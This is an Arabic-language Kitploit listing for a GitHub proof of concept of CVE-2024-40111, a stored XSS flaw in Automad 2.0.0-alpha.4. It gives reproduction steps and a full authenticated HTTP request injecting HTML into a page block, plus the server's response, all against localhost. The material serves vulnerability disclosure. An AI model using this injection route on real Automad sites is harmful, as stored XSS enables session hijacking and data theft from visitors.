Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-40111-Exploit — استغلال لـ: CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4 | Kitploit
أدوات/GitHubGitHub/theexploiters/cve-2024-40111-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubtheexploiters/cve-2024-40111-exploit

CVE-2024-40111-Exploit

استغلال لـ: CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4

عرض المستودع
24منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-40111: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4

تفاصيل الاستغلال

  • عنوان الاستغلال: تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4
  • التاريخ: 2024-06-20
  • مؤلف الاستغلال: Jerry Thomas (w3bn00b3r)
  • الصفحة الرئيسية للبائع: Automad
  • رابط البرنامج: مستودع Automad على GitHub
  • الفئة: تطبيق ويب [نظام إدارة محتوى ملفات مسطحة]
  • الإصدار: 2.0.0-alpha.4
  • تم الاختبار على: Docker الإصدار 26.1.4، Debian GNU/Linux 11 (bullseye)

الوصف

تم تحديد ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في Automad 2.0.0-alpha.4. تسمح هذه الثغرة للمهاجمين بحقن كود JavaScript خبيث في قالب الصفحة، والذي يتم تخزينه داخل نظام إدارة المحتوى. يتم تنفيذ الكود المحقون في متصفح أي مستخدم يزور الصفحة المتأثرة، مما قد يؤدي إلى اختطاف الجلسات، وسرقة البيانات، وأنشطة خبيثة أخرى.

إثبات المفهوم

خطوات إعادة الإنتاج

  1. تسجيل الدخول: قم بتسجيل الدخول كمسؤول وانتقل إلى نقطة النهاية http://localhost/dashboard/home.

  2. تحرير صفحة الترحيب: قم بتحرير صفحة الترحيب الافتراضية.

  3. الانتقال إلى علامة التبويب المحتوى: انتقل إلى http://localhost/dashboard/page?url=%2F&section=text وقم بتحرير الكتلة المسماة Main.

  4. حقن الحمولة: أدخل حمولة XSS التالية:

الطلب

POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

الاستجابة

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}
  1. تشغيل XSS: يتم تشغيل حمولة XSS عند زيارة الصفحة الرئيسية http://localhost/.

Repo View Counter

تنزيل الأداة